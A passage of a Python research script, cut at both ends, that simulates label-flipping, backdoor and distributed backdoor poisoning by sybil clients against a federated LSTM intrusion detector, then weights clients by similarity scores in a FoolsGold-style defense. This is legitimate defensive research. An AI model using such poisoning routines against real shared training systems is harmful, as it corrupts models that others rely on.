scatter_nd_non_aliasing_add_eager_fallback\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Sequential, load_model\nfrom tensorflow.keras.layers import Dense, Dropout, LSTM, Bidirectional \nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nimport sklearn.metrics.pairwise as smp\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, classification_report, confusion_matrix\nfrom fl_ss_data_processing import *\nfrom csv import writer\nimport matplotlib.pyplot as plt\n#from triangle_sector_similarity import Cosine_Similarity,Euclidean_Distance,TS_SS,Pairwise_TS_SS\nimport math\nimport torch\nimport csv\nfrom itertools import zip_longest\nfrom sklearn import preprocessing\nimport config\nfrom scipy.special import logit, expit\nfrom numpy import errstate\nfrom scipy.stats import norm\nfrom sklearn.metrics import jaccard_score\nfrom keras.optimizers import gradient_descent_v2\n#from keras.layers.core import Dense, Dropout, Flatten\n#from keras.layers.convolutional import Conv2D, MaxPooling2D, SeparableConv2D\n#from tensorflow.python.ops.numpy_ops import np_config\nimport poison_config\n\n\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\n# This function loads processed data. \n# file_path_normal: CSV file \n# file_path_abnormal: CSV file\n# returns: 4 arrays\ndef load_processed_data(file_path_normal,file_path_abnormal,path, attack, defense, log_name,num_sybils=1):\n data_process= data_processing()\n timesteps = config.IDS_TIMESTEPS\n x_train,y_train,x_test,y_test,x_trainP,y_trainP,x_testP,y_testP, x_trainDbaProto, x_testDbaProto, y_trainDbaProto, y_testDbaProto , x_trainDbaPkts, x_testDbaPkts, y_trainDbaPkts, y_testDbaPkts, x_trainDbaDport, x_testDbaDport, y_trainDbaDport, y_testDbaDport, x_trainDbaBytes, x_testDbaBytes, y_trainDbaBytes, y_testDbaBytes = data_process.load_data(file_path_normal,file_path_abnormal,config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,config.NUM_SYBILS, timesteps)\n\n #print(\"train shape: \", np.shape(x_train))\n #print(\"test shape: \", np.shape(x_test))\n #print(\"train label shape: \", y_train.shape)\n #print(\"test label shape: \", y_test.shape)\n\n x_train = np.asarray(x_train)\n x_test = np.nan_to_num(x_test)\n x_test = np.asarray(x_test)\n x_trainP = np.asarray(x_trainP)\n x_testP = np.nan_to_num(x_testP)\n x_testP = np.asarray(x_testP)\n x_trainDbaProto = np.asarray(x_trainDbaProto)\n x_testDbaProto = np.nan_to_num(x_testDbaProto)\n x_testDbaProto = np.asarray(x_testDbaProto)\n x_trainDbaPkts = np.asarray(x_trainDbaPkts)\n x_testDbaPkts = np.nan_to_num(x_testDbaPkts)\n x_testDbaPkts = np.asarray(x_testDbaPkts)\n x_trainDbaDport = np.asarray(x_trainDbaDport)\n x_testDbaDport = np.nan_to_num(x_testDbaDport)\n x_testDbaDport = np.asarray(x_testDbaDport)\n x_trainDbaBytes = np.asarray(x_trainDbaBytes)\n x_testDbaBytes = np.nan_to_num(x_testDbaBytes)\n x_testDbaBytes = np.asarray(x_testDbaBytes)\n return x_train,y_train,x_test,y_test,x_trainP,y_trainP,x_testP,y_testP, x_trainDbaProto, x_testDbaProto, y_trainDbaProto, y_testDbaProto , x_trainDbaPkts, x_testDbaPkts, y_trainDbaPkts, y_testDbaPkts, x_trainDbaDport, x_testDbaDport, y_trainDbaDport, y_testDbaDport, x_trainDbaBytes, x_testDbaBytes, y_trainDbaBytes, y_testDbaBytes\n\n\n''' create_clients creates a number of \n args:\n image_list: a list of numpy arrays of training images\n label_list:a list of binarized labels for each image\n num_client: number of fedrated members (clients)\n initials: the clients'name prefix, e.g, clients_1\n\n return: a dictionary with keys clients' names and value as\n data shards - tuple of images and label lists.\n \n'''\ndef create_clients(path, attack, num_sybils, defense, log_name, x_train, y_train, num_clients=10, initial='clients'):\n print(\"Create Clients: {}\\n\".format(num_clients))\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write(\"Create Clients: {}\\n\".format(num_clients))\n f.close()\n\n # create a list of client names\n if attack == 'label' or attack == 'backdoor':\n client_names = ['{}_{}'.format(initial, i + (num_sybils+1)) for i in range(num_clients)]\n elif attack == 'dba':\n client_names = ['{}_{}'.format(initial, i + ((num_sybils*4)+1)) for i in range(num_clients)]\n # shard data and place at each client\n size = len(x_train) // num_clients\n #print(\"size is \", size, \"\\n\")\n client_dict={}\n for i in range(num_clients):\n client_dict[client_names[i]]= [x_train[i:i + size], y_train[i:i + size]]\n #print(\"client is \", client_names[i])\n\n return client_dict\n\n\ndef create_backdoor_sybils(path, attack, defense, log_name,x_trainP, y_trainP, num_sybils=1, num_clients=1, initial='client'):\n print(\"Creating Backdoor sybils\\nnum sybils {} and num clients {}\".format(num_sybils, num_clients))\n num = num_sybils\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write(\"Create Backdoor Sybils: {}\\n\".format(num_sybils))\n f.close()\n\n\n # create a list of sybil names i + 1\n sybil_names = ['{}_{}'.format(initial, i + 1) for i in range(num_sybils)]\n\n # shard data and place at each client\n size = len(x_trainP) // num_sybils\n #print(\"size is \", size, \"\\n\")\n sybil_dict={}\n for i in range(num_sybils):\n sybil_dict[sybil_names[i]]= [x_trainP[i:i + size], y_trainP[i:i + size]]\n #print(\"client is \", client_names[i])\n\n return sybil_dict\n\ndef create_dba_sybils(path, attack, defense, log_name, x_trainDbaProto, y_trainDbaProto,x_trainDbaPkts, y_trainDbaPkts,x_trainDbaDport,y_trainDbaDport, x_trainDbaBytes, y_trainDbaBytes, num_sybils=1,num_clients=1, initial='client'):\n print(\"create_dba sybils num sybils {} and num clients {}\".format(num_sybils, num_clients))\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write('\\nCreate DBA Sybils {}\\n'.format(num_sybils))\n f.close()\n print('Creating {} DBA Sybils with Data Shards \\n'.format(num_sybils))\n sybil_dict={}\n protoDict = create_proto_sybils(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME, x_trainDbaProto, y_trainDbaProto,config.NUM_SYBILS, config.NUM_CLIENTS, initial='client')\n sybil_dict.update(protoDict)\n pktsDict = create_pkts_sybils(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME, x_trainDbaPkts, y_trainDbaPkts,config.NUM_SYBILS, config.NUM_CLIENTS, initial='client')\n sybil_dict.update(pktsDict)\n dportDict = create_dport_sybils(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME, x_trainDbaDport, y_trainDbaDport, config.NUM_SYBILS, config.NUM_CLIENTS, initial='client')\n sybil_dict.update(dportDict) \n bytesDict = create_bytes_sybils(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME, x_trainDbaBytes, y_trainDbaBytes, config.NUM_SYBILS, config.NUM_CLIENTS, initial='client')\n sybil_dict.update(bytesDict)\n\n return sybil_dict\n\n\ndef create_proto_sybils(path, attack, defense, log_name, x_trainDbaProto, y_trainDbaProto, num_sybils,num_clients=1, initial='client'):\n print(\"create_proto sybils num sybils {} and num clients {}\".format(num_sybils, num_clients))\n num = num_sybils\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write('\\nCreate Proto DBA Sybils: {}\\n'.format(num))\n f.close()\n print('Creating {} Proto DBA Sybils with Data Shards \\n'.format(num))\n\n # create a list of sybil names\n sybil_names = ['{}_{}'.format(initial, i + 1) for i in range(num)]\n\n # shard data and place at each client\n sizeProto = len(x_trainDbaProto) // num_sybils\n #print(\"size is \", size, \"\\n\")\n sybil_dict={}\n \n for i in range(num):\n sybil_dict[sybil_names[i]]= [x_trainDbaProto[i:i + sizeProto], y_trainDbaProto[i:i + sizeProto]]\n #print(\"client is \", client_names[i])\n\n return sybil_dict\n\ndef create_pkts_sybils(path, attack, defense, log_name, x_trainDbaPkts, y_trainDbaPkts, num_sybils,num_clients=1, initial='client'):\n print(\"create_pkts sybils num sybils {} and num clients {}\".format(num_sybils, num_clients))\n num = num_sybils\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write('\\nCreate Pkts DBA Sybils: {}\\n'.format(num))\n f.close()\n print('Creating {} Pkts DBA Sybils with Data Shards \\n'.format(num))\n \n if num == 1:\n iPlus = 2\n elif num == 5:\n iPlus = 6\n else:\n iPlus = 11\n\n # create a list of sybil names\n sybil_names = ['{}_{}'.format(initial, i + iPlus) for i in range(num)]\n\n # shard data and place at each client\n sizePkts = len(x_trainDbaPkts) // num_sybils\n #print(\"size is \", size, \"\\n\")\n sybil_dict={}\n \n for i in range(num):\n sybil_dict[sybil_names[i]]= [x_trainDbaPkts[i:i + sizePkts], y_trainDbaPkts[i:i + sizePkts]]\n #print(\"client is \", client_names[i])\n\n return sybil_dict\n\ndef create_dport_sybils(path, attack, defense, log_name, x_trainDbaDport, y_trainDbaDport, num_sybils,num_clients=1, initial='client'):\n print(\"create_dport sybils num sybils {} and num clients {}\".format(num_sybils, num_clients))\n num = num_sybils\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write('\\nCreate Dport DBA Sybils: {}\\n'.format(num))\n f.close()\n print('Creating {} Dport DBA Sybils with Data Shards \\n'.format(num))\n \n if num == 1:\n iPlus = 3\n elif num == 5:\n iPlus = 11\n else:\n iPlus = 21\n\n # create a list of sybil names\n sybil_names = ['{}_{}'.format(initial, i + iPlus) for i in range(num)]\n\n # shard data and place at each client\n sizeDport = len(x_trainDbaDport) // num_sybils\n #print(\"size is \", size, \"\\n\")\n sybil_dict={}\n \n for i in range(num):\n sybil_dict[sybil_names[ i]]= [x_trainDbaDport[i:i + sizeDport], y_trainDbaDport[i:i + sizeDport]]\n #print(\"client is \", client_names[i])\n\n return sybil_dict\n\ndef create_bytes_sybils(path, attack, defense, log_name, x_trainDbaBytes, y_trainDbaBytes, num_sybils,num_clients=1, initial='client'):\n print(\"create_bytes sybils num sybils {} and num clients {}\".format(num_sybils, num_clients))\n num = num_sybils\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write('\\nCreate Bytes DBA Sybils: {}\\n'.format(num))\n f.close()\n print('Creating {} Bytes DBA Sybils with Data Shards \\n'.format(num))\n \n if num == 1:\n iPlus = 4\n elif num == 5:\n iPlus = 16\n else:\n iPlus = 31\n\n # create a list of sybil names\n sybil_names = ['{}_{}'.format(initial, i + iPlus) for i in range(num)]\n\n # shard data and place at each client\n sizeBytes = len(x_trainDbaBytes) // num_sybils\n #print(\"size is \", size, \"\\n\")\n sybil_dict={}\n \n for i in range(num):\n sybil_dict[sybil_names[i]]= [x_trainDbaBytes[i:i + sizeBytes], y_trainDbaBytes[i:i + sizeBytes]]\n #print(\"client is \", client_names[i])\n\n return sybil_dict\n\n''' create_attackers creates a number of \n args:\n image_list: a list of numpy arrays of training images\n label_list:a list of binarized labels for each image\n attack_dict: dict of chosen attackers from client list\n initials: the clients'name prefix, e.g, clients_1\n\n return: a dictionary with keys clients' names and value as\n data shards - tuple of images and label lists.\n \n'''\ndef create_label_flip_sybils(path, attack, defense, log_name, x_train, y_train,num_sybils=1, num_clients=10, initial='clients'):\n\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write(\"\\nCreate Label Flip Sybils: {}\\n\".format(num_sybils))\n f.close()\n print(\"\\nCreating Label Flip Sybils with Data Shards \\n\")\n\n # create a list of client names\n client_names = ['{}_{}'.format(initial, i + 1) for i in range(num_sybils)]\n if num_sybils == 1:\n num = 3\n elif num_sybils == 5:\n num = 5\n elif num_sybils == 10:\n num = 10\n # shard data and place at each client\n size = len(x_train) // num\n #print(\"size is \", size, \"\\n\")\n client_dict={}\n for i in range(num_sybils):\n client_dict[client_names[i]]= [x_train[i:i + size], y_train[i:i + size]]\n \n for (client_name, data) in client_dict.items():\n data = replace_1_with_0(config.PATH, config.ATTACK, config.NUM_SYBILS, config.DEFENSE, config.LOG_NAME, data[1])\n return client_dict\n\n### for attacking all of a data set\ndef replace_1_with_0(path, attack, num_sybils, defense, log_name,data):\n \"\"\"\n :param targets: Target class IDs\n :type targets: list\n :param target_set: Set of class IDs possible\n :type target_set: list\n :return: new class IDs\n \"\"\"\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write(\"\\nFlipping Labels\\n\")\n f.close()\n print(\"Flipping Labels\")\n #print(data[:])\n for idx in range(len(data)):\n if (data[idx] == [1]).all():\n data[idx] = 0\n #print(data[:])\n return data\n\ndef get_model(timesteps,n_features):\n # loading the saved model\n #loaded_model = tf.keras.models.load_model('./IDS_Persistent_Model/persistent_model_tf')\n #then call fit\n \n \n sgd = gradient_descent_v2.SGD(learning_rate=0.001, momentum=0.9, nesterov=True)\n \n model = Sequential()\n \n #model.add(LSTM(256, return_sequences=True, input_shape=(timesteps, n_features)))\n #model.add(Dense(128, activation='relu'))\n #model.add(Dropout(.2))\n #model.add(LSTM(128, return_sequences=True))\n #model.add(Dense(64, activation='relu'))\n #model.add(Dropout(.25))\n #model.add(LSTM(64))\n #model.add(Dropout(.25))\n \n model.add(Bidirectional(LSTM(29, return_sequences=False), input_shape=(timesteps, n_features)))\n #model.add(Dense(15, activation='relu'))\n model.add(Dropout(.3))\n \n \n model.add(Dense(1, activation='sigmoid'))\n #model.compile(optimizer=keras.optimizers.Adam(), loss=keras.losses.BinaryCrossentropy(), metrics=[keras.metrics.CategoricalAccuracy(),'accuracy'])\n model.compile(optimizer=sgd, loss=keras.losses.BinaryCrossentropy(), metrics=[keras.metrics.BinaryAccuracy()])\n #model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n #with open('C:\\\\Users\\\\ChristianDunham\\\\source\\\\repos\\\\Intrusion_Detection\\\\data\\\\model_summary.txt','a') as f:\n # f.write(str(model.summary()))\n # f.close()\n #print(model.summary())\n \n #return loaded_model\n return model\n\n\ndef model_training(model,x_train,y_train,epochs=4000):\n #callbacks = EarlyStopping(monitor='accuracy', mode='max', verbose=0, patience=10,\n callbacks = EarlyStopping(monitor='binary_accuracy', mode='max', verbose=0, patience=1000,\n restore_best_weights=True)\n checkpoint_filepath = './ids_epoch_models/IDS/best_model.h5'\n mc = ModelCheckpoint(filepath=checkpoint_filepath, monitor='binary_accuracy', mode='max', verbose=2, save_best_only=True)\n ###### Change me back to 5\n ###### Swapped from 5 to speed things up for generating data\n #batch_size = 5\n batch_size = config.BATCH_SIZE\n X_train = x_train.copy()\n Y_train = y_train.copy()\n accuracy_callback = AccuracyCallback((X_train, Y_train))\n\n class_weights = {0:1.25,1:1.}\n #use verbose = 1 or 2 to see epoch progress pbar... each step is examples / batch\n train_history = model.fit(x_train,\n y_train,\n epochs=epochs,\n validation_split=0.2,\n class_weight=class_weights,\n shuffle=False,\n #validation_data=(x_test, (y_test, x_test)),\n batch_size=batch_size,\n verbose=0,\n callbacks=[callbacks,mc]\n )\n #print(\"\\n\\nBest Training Poisoning Accuracy:\\n{}\".format(max(train_history.history['binary_accuracy'])))\n #with open(config.PATH + config.ATTACK +'_'+ str(config.NUM_SYBILS) +'_sybil_'+ config.DEFENSE +'_IDS_model_'+ config.LOG_NAME,'a') as f:\n # f.write(\"\\n\\nBest Training IDS Accuracy:\\n{}\".format(max(train_history.history['binary_accuracy'])))\n #f.close()\n #print(\"\\n\\nBest Training Poisoning Loss:\\n{}\".format(max(train_history.history['loss'])))\n #with open(config.PATH + config.ATTACK +'_'+ str(config.NUM_SYBILS) +'_sybil_'+ config.DEFENSE +'_IDS_model_'+ config.LOG_NAME,'a') as f:\n # f.write(\"\\n\\nBest Training IDS Accuracy:\\n{}\".format(max(train_history.history['binary_accuracy'])))\n #f.close()\n\n \n #print(train_history.history.keys())\n plt.plot(train_history.history['binary_accuracy'])\n plt.plot(train_history.history['val_binary_accuracy'])\n plt.title('Model Accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train','test'], loc='upper left')\n plt.savefig('ids_train_accuracy.png')\n #plt.show()\n\n plt.plot(train_history.history['loss'])\n plt.plot(train_history.history['val_loss'])\n plt.title('Model Loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train','test'], loc='upper left')\n plt.savefig('ids_train_loss.png')\n #plt.show()\n \n \n #loss_fig = proto_distribution.plot(kind='bar', figsize=(20,16), fontsize=14).get_figure()\n #loss_fig.savefig('proto_distr.pdf')\n model = load_model(checkpoint_filepath)\n\n\n return model\n\ndef model_evaluate(path, attack, defense, log_name,model,x_train,y_train,x_test,y_test,epochs, num_sybils):\n train_pred = (model.predict(x_train, steps=None, callbacks=None, max_queue_size=10, workers=1, use_multiprocessing=False,verbose=0) > .5).astype(\"int32\") \n train_labels = np.copy(y_train).astype(\"int32\")\n test_pred = (model.predict(x_test) > .5).astype(\"int32\") \n test_labels = np.copy(y_test).astype(\"int32\")\n print(\"predicted value:\\n{}\".format(test_pred))\n print(\"label value:\\n{}\".format(test_labels))\n trainAcc = accuracy_score(train_labels, train_pred)\n testAcc = accuracy_score(test_labels, test_pred)\n f1 = f1_score(test_labels, test_pred, zero_division=0)\n precision = precision_score(test_labels, test_pred)\n classes_report = classification_report(test_labels, test_pred)\n #matrix = confusion_matrix(test_labels, test_pred, labels=[1,0])\n unique_label = [0,1]\n cmtx = pd.DataFrame(\n confusion_matrix(test_labels, test_pred, labels=unique_label), \n index=['true:{:}'.format(x) for x in unique_label], \n columns=['pred:{:}'.format(x) for x in unique_label]\n )\n\n\n list_data = [epochs, testAcc,f1, precision]\n with open(config.PATH + config.ATTACK +'_'+ str(config.NUM_SYBILS) +'_sybil_'+ config.DEFENSE +'_ids_model_results.csv' ,'a',newline='') as f_object:\n writer_object = writer(f_object)\n writer_object.writerow(list_data)\n f_object.close()\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_model_'+ log_name,'a') as f:\n f.write('\\n##################### IDS ###############################################\\n')\n f.write('\\n############################################################################################\\n')\n f.write('\\ncomm_round: {} | global_test_acc: {:.3%} | global_f1: {} | global_precision: {}\\n'.format(epochs, testAcc, f1, precision))\n f.write(str(classes_report))\n #f.write(\"\\nAccuracy per class:\\n{}\\n{}\\n\".format(matrix,matrix.diagonal()/matrix.sum(axis=1)))\n f.close()\n print('\\n##################### IDS ###############################################\\n')\n print('\\n############################################################################################\\n')\n print('\\ncomm_round: {} |global_train_acc: {:.3%}|| global_test_acc: {:.3%} | global_f1: {} | global_test_precision: {}'.format(epochs, trainAcc, testAcc, f1, precision))\n print(classes_report)\n #print(\"\\nAccuracy per class:\\n{}\\n{}\\n\".format(matrix,(matrix.diagonal()/matrix.sum(axis=1))))\n print(cmtx)\n\nclasses = ['normal','attack']\nclass AccuracyCallback(tf.keras.callbacks.Callback):\n\n def __init__(self, test_data):\n self.test_data = test_data\n self.class_history = ['normal', 'abnormal']\n\n def on_epoch_end(self, epoch, logs=None):\n x_data, y_data = self.test_data\n\n correct = 0\n incorrect = 0\n\n x_result = self.model.predict(x_data, verbose=0)\n\n x_numpy = []\n\n for i in classes:\n self.class_history.append([])\n\n class_correct = [0] * len(classes)\n class_incorrect = [0] * len(classes)\n\n for i in range(len(x_data)):\n x = x_data[i]\n y = y_data[i]\n\n res = x_result[i]\n\n actual_label = np.argmax(y)\n pred_label = np.argmax(res)\n\n if(pred_label == actual_label):\n x_numpy.append([\"cor:\", str(y), str(res), str(pred_label)]) \n class_correct[actual_label] += 1 \n correct += 1\n else:\n x_numpy.append([\"inc:\", str(y), str(res), str(pred_label)])\n class_incorrect[actual_label] += 1\n incorrect += 1\n with open('C:\\\\Users\\\\ChristianDunham\\\\source\\\\repos\\\\Intrusion_Detection\\\\data\\\\output\\\\training_log.txt','a') as f:\n f.write(\"\\n\\tCorrect: %d\" %(correct))\n f.write(\"\\tIncorrect: %d\" %(incorrect))\n f.close()\n #print(\"\\n\\tCorrect: %d\" %(correct))\n #print(\"\\tIncorrect: %d\" %(incorrect))\n\n for i in range(len(classes)):\n tot = float(class_correct[i] + class_incorrect[i])\n class_acc = -1\n if (tot > 0):\n class_acc = float(class_correct[i]) / tot\n with open('C:\\\\Users\\\\ChristianDunham\\\\source\\\\repos\\\\Intrusion_Detection\\\\data\\\\output\\\\training_log.txt','a') as f:\n f.write(\"\\t%s: %.3f\" %(classes[i],class_acc))\n f.close()\n #print(\"\\t%s: %.3f\" %(classes[i],class_acc)) \n\n acc = float(correct) / float(correct + incorrect) \n with open('C:\\\\Users\\\\ChristianDunham\\\\source\\\\repos\\\\Intrusion_Detection\\\\data\\\\output\\\\training_log.txt','a') as f:\n f.write(\"\\tCurrent Network Accuracy: %.3f \\n\" %(acc))\n f.close()\n #print(\"\\tCurrent Network Accuracy: %.3f\" %(acc))\n\n############################ Addtional Similarities\ndef pardonWV(n_clients, maxsm, sm, prc):\n # pardoningF for sm\n for i in range(n_clients):\n for j in range(config.POISON_FEATURES - 1):\n if i == j:\n continue\n if maxsm[i] < maxsm[j]:\n sm[i][j] = (sm[i][j] * maxsm[i]) / (maxsm[j] * prc)\n \n wv = 1 - (np.max(sm, axis=1))\n\n wv[wv > 1] = 1\n wv[wv < 0] = 0\n\n alpha = np.max(sm, axis=1)\n\n # Rescale so that max value is wv\n wv = wv / np.max(wv)\n wv[(wv == 1)] = .99\n\n # Logit function\n with np.errstate(divide='ignore'):\n wv = (np.log(wv / (1 - wv)) + 0.5)\n wv[(np.isinf(wv) + wv > 1)] = 1\n wv[(wv < 0)] = 0\n\n return wv,alpha\n\ndef std(a):\n return (np.std(a))\n\ndef std_set(a_set):\n std_a_set = np.zeros(a_set.shape) \n\n for x in range(0, len(a_set)):\n std_a_set[x] = std(a_set[x])\n\n return std_a_set\n\ndef get_std(path, attack, defense, log_name,grads, num_sybils=1):\n #### could use scipy logit(grads) here?\n n_clients = len(grads)\n # 1. Logit\n std = std_set(grads)\n sm = 2.*(std - np.min(std))/np.ptp(std)-1\n prc = 0.05 # adjust value to improve results\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nED Similarity is\\n {}\\n\".format(sm))\n # f.close()\n prc = 1 \n maxsm = np.max(sm, axis=1)\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nMaxsm is\\n {}\".format(maxsm))\n # f.close()\n \n prc = 1 \n maxsm = np.max(sm, axis=1)\n wv, alpha = pardonWV(n_clients, maxsm, sm, prc)\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\n\\nED wv is {}\\n\".format(wv))\n # f.close()\n return wv,alpha\n\ndef norm_dist(a):\n return (norm.pdf(a,loc=np.nanmean(a), scale = 1))\n\ndef norm_dist_a_set(a_set):\n \"\"\"computes jaccard for all vectors in a set\"\"\"\n norm_dist_set = np.zeros(a_set.shape) \n\n for x in range(0, len(a_set)):\n norm_dist_set[x] = norm_dist(a_set[x])\n\n return norm_dist_set\n### shows the distrubtion of points by desnity \n### gets the \ndef get_norm_dist(path, attack, defense, log_name,grads, num_sybils=1):\n n_clients = len(grads)\n # 1. Logit\n nd = norm_dist_a_set(grads)\n sm = 2.*(nd - np.min(nd))/np.ptp(nd)-1\n prc = 0.05 # adjust value to improve results\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nED Similarity is\\n {}\\n\".format(sm))\n # f.close()\n prc = 1 \n maxsm = np.max(sm, axis=1)\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nMaxsm is\\n {}\".format(maxsm))\n # f.close()\n \n prc = 1 \n maxsm = np.max(sm, axis=1)\n wv, alpha = pardonWV(n_clients, maxsm, sm, prc)\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\n\\nED wv is {}\\n\".format(wv))\n # f.close()\n return wv,alpha\n\n\ndef jaccard_similarity(a, b):\n # convert to set\n a = set(a)\n b = set(b)\n # calucate jaccard similarity\n j = float(len(a.intersection(b))) / len(a.union(b))\n return j\n\ndef jaccard_a_set(a_set):\n \"\"\"computes jaccard for all vectors in a set\"\"\"\n jaccard_set = np.zeros(a_set.shape) \n\n length = len(a_set) - 1\n best = 0.0\n for x in range(length):\n for y in range(length):\n if x == y:\n continue\n temp = jaccard_similarity(a_set[x], a_set[y])\n if temp > best:\n best = temp\n jaccard_set[x] = best \n\n return jaccard_set\n\n## values of 0 to 1 with 1 being similar 0 is not so we dont' want to pardon these the same way\ndef jaccard(path, attack, defense, log_name,grads, num_sybils=1):\n n_clients = len(grads)\n # 1. Logit\n sm = jaccard_a_set(grads)\n \n # pardoningF for sm\n wv = np.zeros(n_clients)\n for i in range(n_clients):\n wv[i] = np.sum(sm[i])\n\n \n wv = 1 - (np.max(sm, axis=1))\n\n wv[wv > 1] = 1\n wv[wv < 0] = 0\n\n alpha = np.max(sm, axis=1)\n\n # Rescale so that max value is wv\n wv = wv / np.max(wv)\n wv[(wv == 1)] = .99\n\n # Logit function\n with np.errstate(divide='ignore'):\n wv = (np.log(wv / (1 - wv)) + 0.5)\n wv[(np.isinf(wv) + wv > 1)] = 1\n wv[(wv < 0)] = 0\n\n return wv,alpha\n\ndef softmax(a_vector):\n \"\"\"Compute a logit for a vector.\"\"\"\n denom = (1 + sum(np.exp(a_vector)))\n logit = np.exp(a_vector)/denom\n return logit\n\ndef inv_log_a_set(a_set):\n \"\"\"computes logits for all vectors in a set\"\"\"\n softmax_set = np.zeros(a_set.shape) \n\n for x in range(0, len(a_set)):\n softmax_set[x] = softmax(a_set[x])\n\n return softmax_set\n\n## probability of logit 0 to 1 mapped in real numbers neg inf to inf...\n## however the inverse of that 0 = negative inf and 1 = pos inf..\n## no need to pardon this either?\ndef get_inv_logit(path, attack, defense, log_name,grads, num_sybils=1):\n n_clients = len(grads)\n # 1. Logit\n sm = inv_log_a_set(grads)\n prc = 1 \n maxsm = np.max(sm, axis=1)\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nMaxsm is\\n {}\".format(maxsm))\n # f.close()\n \n prc = 1 \n maxsm = np.max(sm, axis=1)\n wv, alpha = pardonWV(n_clients, maxsm, sm, prc)\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\n\\nED wv is {}\\n\".format(wv))\n # f.close()\n return wv,alpha\n\n\ndef ed(path, attack, defense, log_name,grads, num_sybils=1):\n n_clients = len(grads)\n # 1. Euclidean Normalized\n distance_calc = smp.euclidean_distances(grads)\n normalized = 2.*(distance_calc - np.min(distance_calc))/np.ptp(distance_calc)-1\n sm = normalized - np.eye(n_clients)\n prc = 0.05 # adjust value to improve results\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nED Similarity is\\n {}\\n\".format(sm))\n # f.close()\n prc = 1 \n maxsm = np.max(sm, axis=1)\n #print(\"Maxsm is\\n {}\".format(maxsm))\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nMaxsm is\\n {}\".format(maxsm))\n # f.close()\n \n # pardoning\n for i in range(n_clients):\n for j in range(n_clients):\n if i == j:\n continue\n if maxsm[i] < maxsm[j]:\n sm[i][j] = sm[i][j] * maxsm[i] / maxsm[j] * prc\n wv = 1 - (np.max(sm, axis=1))\n\n wv[wv > 1] = 1\n wv[wv < 0] = 0\n\n alpha = np.max(sm, axis=1)\n\n # Rescale so that max value is wv\n wv = wv / np.max(wv)\n wv[(wv == 1)] = .99\n\n # Logit function\n wv = (np.log(wv / (1 - wv)) + 0.5)\n wv[(np.isinf(wv) + wv > 1)] = 1\n wv[(wv < 0)] = 0\n\n # wv is the weight\n return wv,alpha\n\n\ndef manhattan(path, attack, defense, log_name,grads, num_sybils=1):\n n_clients = len(grads)\n # 2. Manhattan Normalized\n distance_calc = smp.manhattan_distances(grads)\n normalized = 2.*(distance_calc - np.min(distance_calc))/np.ptp(distance_calc)-1\n sm = normalized - np.eye(n_clients)\n prc = 0.05 # adjust value to improve results\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nManhattan Similarity is\\n {}\\n\".format(sm))\n # f.close()\n prc = 1 \n maxsm = np.max(sm, axis=1)\n #print(\"Maxsm is\\n {}\".format(maxsm))\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nMaxsm is\\n {}\".format(maxsm))\n # f.close()\n \n # pardoning\n for i in range(n_clients):\n for j in range(n_clients):\n if i == j:\n continue\n if maxsm[i] < maxsm[j]:\n sm[i][j] = sm[i][j] * maxsm[i] / maxsm[j] * prc\n wv = 1 - (np.max(sm, axis=1))\n\n wv[wv > 1] = 1\n wv[wv < 0] = 0\n\n alpha = np.max(sm, axis=1)\n\n # Rescale so that max value is wv\n wv = wv / np.max(wv)\n wv[(wv == 1)] = .99\n\n # Logit function\n wv = (np.log(wv / (1 - wv)) + 0.5)\n wv[(np.isinf(wv) + wv > 1)] = 1\n wv[(wv < 0)] = 0\n\n # wv is the weight\n return wv,alpha\n\n# Takes in grad\n# Compute similarity\n# Get weightings\ndef foolsGold(path, attack, defense, 